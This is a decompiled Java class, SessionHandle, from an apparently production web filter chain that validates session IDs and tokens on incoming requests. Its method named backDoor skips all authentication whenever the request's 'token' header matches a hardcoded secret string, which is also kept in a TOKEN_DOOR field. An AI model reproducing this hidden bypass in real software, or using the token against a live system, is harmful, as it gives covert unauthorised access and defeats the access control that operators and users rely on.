/*
 * Decompiled with CFR 0.152.
 */
package com.manatee.mtop.filter.handle.impl;

import com.manatee.common.domain.ResultCode;
import com.manatee.common.exception.BizException;
import com.manatee.common.util.StringUtil;
import com.manatee.mtop.filter.handle.IHandle;
import com.manatee.mtop.filter.handle.domain.MtopContext;
import com.manatee.mtop.filter.handle.domain.MtopData;
import com.manatee.mtop.filter.handle.domain.MtopResult;
import com.manatee.mtop.filter.source.MtopDataSource;
import javax.annotation.Resource;
import javax.servlet.http.HttpServletRequest;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Component;

@Component
public class SessionHandle
implements IHandle {
    private Logger log = LoggerFactory.getLogger(SessionHandle.class);
    @Resource
    private MtopDataSource mtopDataSource;
    private final String TOKEN_DOOR = "d50abbd3ddbf9NM";

    @Override
    public void doHandle(MtopContext context) throws Exception {
        Long userId;
        HttpServletRequest request = context.getRequest();
        if (request == null) {
            throw new BizException(ResultCode.SYSTEM_ERROR, "HttpServletRequest_is_null");
        }
        if (this.backDoor(request)) {
            return;
        }
        boolean needlogin = this.mtopDataSource.isNeedLogin(request);
        String sessionId = request.getHeader("session");
        if (!needlogin && StringUtil.isBlank((String)sessionId)) {
            return;
        }
        MtopResult mtopResult = this.getMtopResult(request);
        if (needlogin) {
            this.needLogin(request, mtopResult, sessionId);
        }
        if ((userId = mtopResult.getUserId()) != null) {
            request.setAttribute("userId", (Object)userId);
        }
    }

    private void needLogin(HttpServletRequest request, MtopResult mtopResult, String sessionId) throws BizException {
        if (StringUtil.isBlank((String)sessionId)) {
            this.log.warn("[SessionHandle.doHandle]_biz_error,msg:sessionId_is_null,sessionId:{}", (Object)sessionId);
            throw new BizException(ResultCode.PARAM_IS_ERROR, "sessionId_is_null");
        }
        if (!this.checkToken(request, mtopResult)) {
            this.log.warn("[SessionHandle.doHandle]_biz_error,msg:token_error,sessionId:{}", (Object)sessionId);
            throw new BizException(ResultCode.NOT_AUTHORIZED, "token_is_error");
        }
    }

    private MtopResult getMtopResult(HttpServletRequest request) {
        String app = request.getHeader("app");
        String domain = this.getDomain(app);
        String source = request.getHeader("source");
        String sessionId = request.getHeader("session");
        MtopData mtopData = new MtopData();
        mtopData.setSource(source);
        mtopData.setDomain(domain);
        mtopData.setSessionId(sessionId);
        return this.mtopDataSource.getSessionResult(mtopData);
    }

    private boolean backDoor(HttpServletRequest request) {
        String token = request.getHeader("token");
        return "d50abbd3ddbf9NM".equals(token);
    }

    private boolean checkToken(HttpServletRequest request, MtopResult mtopResult) {
        String token = request.getHeader("token");
        if (StringUtil.isBlank((String)token)) {
            return false;
        }
        String mtopToken = mtopResult.getToken();
        return token.equals(mtopToken);
    }

    private String getDomain(String app) {
        String domain = "ses";
        if (app != null && !"shootAlpha".equals(app)) {
            domain = app;
        }
        return domain;
    }

    @Override
    public String getName() {
        return "session";
    }
}

